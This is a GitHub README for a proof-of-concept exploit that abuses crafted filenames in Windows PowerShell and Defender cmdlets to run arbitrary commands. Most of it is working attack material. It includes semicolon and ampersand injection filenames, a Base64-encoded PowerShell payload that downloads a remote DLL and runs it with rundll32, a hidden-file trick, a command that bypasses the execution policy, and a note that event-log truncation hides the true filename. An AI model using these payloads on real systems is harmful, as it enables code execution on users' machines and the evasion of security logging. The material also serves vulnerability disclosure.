Skip to content

Latest commit

 

History

History
148 lines (86 loc) · 5.05 KB

README.md

File metadata and controls

148 lines (86 loc) · 5.05 KB

PSTrojanFile

Windows PowerShell Filename and Defender Anti-Malware API - Code Execution POC

Discovery: John Page (aka hyp3rlinx) 2019 and revisted 2023

Updated Dec 24, 2023

Bypassing single quotes obstacle in PowerShell for code exec and bonus PS Windows Event log fail!
Semicolon and friend "&" operator join forces for arbitrary code exec capabilities.

Run some unwanted malware:
C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5

OR

Windows defender Anti-malware scan:
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Where Malware.exe lives in the same directory, think drive-by download.

Windows Event log fail, PS event ID 403, fails to log the true filename due to truncating:

PS log snippet:

HostApplication=powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected
EngineVersion=5.1.19041.3803

Call ping cmd? why not
C:>powershell get-filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5

Logoff victim:
C:>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

Updated: Dec 7, 2023 added CL and Windows Defender API vector, see below:

Since it still works, I dusted off and made minor improvements:

  1. Execute a remote DLL using rundll32
  2. Execute an unintended secondary PS1 script or local text-file (can be hidden)
  3. Updated the PS1 Trojan Filename Creator Python3 Script

First reported to Microsoft back in 2019 yet remains unfixed as of the time of this writing.

Remote code execution via a specially crafted filename.

The flaw is due to semicolon ";" we can decode a Base64 command and execute straight from the PS1 filename or just exec commands.

Test;POweRsHeLL -e [BASE64 UTF-16LE PAYLOAD];.ps1

Call commands straight away

"Testing;saps (gc -) PoC;.ps1"

Vectors: double click, drag and drop to PS shortcut

Leverages alternate shorthand PS commands like "saps", "gc" start a process and get-content etc.

DLL Execution Example:

Create a trojan PS1 file that will try to download and execute a remote DLL named "1.d"

Python:

from base64 import b64encode

b64encode("saps http[]//127.0.0.1/1.d;sleep -s 2;rundll32 $HOME\Downloads\1.d, 0".encode('UTF-16LE'))

cwBhAHAAcwAgACAAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQAvADEALgBkADsAcwBsAGUAZQBwACAALQBzACAAMgA7AHIAdQBuAGQAbABsADMAMgAgACQASABPAE0ARQBcAEQAbwB3AG4AbABvAGEAZABzAFwAMQAuAGQALAAgADAA

DLL Code:

#include <windows.h>

//gcc -shared -o mydll.dll mydll.c -m32

//hyp3rlinx

void evilo(void){

MessageBox(0,"Filename Remote Code Execution PoC\r\nBy hyp3rlinx","M$ Windows PowerShell",1);

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){

evilo();

return 0;

}

python -m http.server 80

Double click the trojan PS1 file.

Text-file Code Execution Example:

Create a PS1 file with name including saps "start a process" and gc "get-content", this will read commands from hidden file.

"Test;saps (gc -) PoC;.ps1"

Create hidden: attrib +s +h "-"

Double click or drag and drop.

Requirements:

a) PowerShell PS1 files must be set to open with PowerShell as the default program

b) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

c) User must double-click, run from cmd line or drag and drop the maliciously named PS1 script

https://www.youtube.com/watch?v=-ZJnA70Cf4I

PS_Trojan_Filename_Exploit.mp4

PSTrojanFile

Update: Microsoft Defender Anti-Malware PowerShell API - Arbitrary Code Execution.

Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code. E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code. This vector builds upon my previous advisory and subsequent project PSTrojanFile.

Requirements:

  1. On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script
  2. Executable file of same name as the parameter that lives nearby

Examples:
powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads;saps Helper;.1.zip" (Helper.exe lives on Desktop)

Create directory ";saps Test", Test.exe, Test.cmd etc is on same CL path
powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"

Create directory with semicolon, drop PE file named doom.exe in same path.
powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom"

Last but not least: When grabbing a file hash in PowerShell logs you out :)
c:>powershell get-filehash -algorithm MD5 "Malware;saps logoff.exe"

https://www.youtube.com/watch?v=0Go6yJiRWP8

Windows.PowerShell.API.Arbitrary.Code.Exection.mp4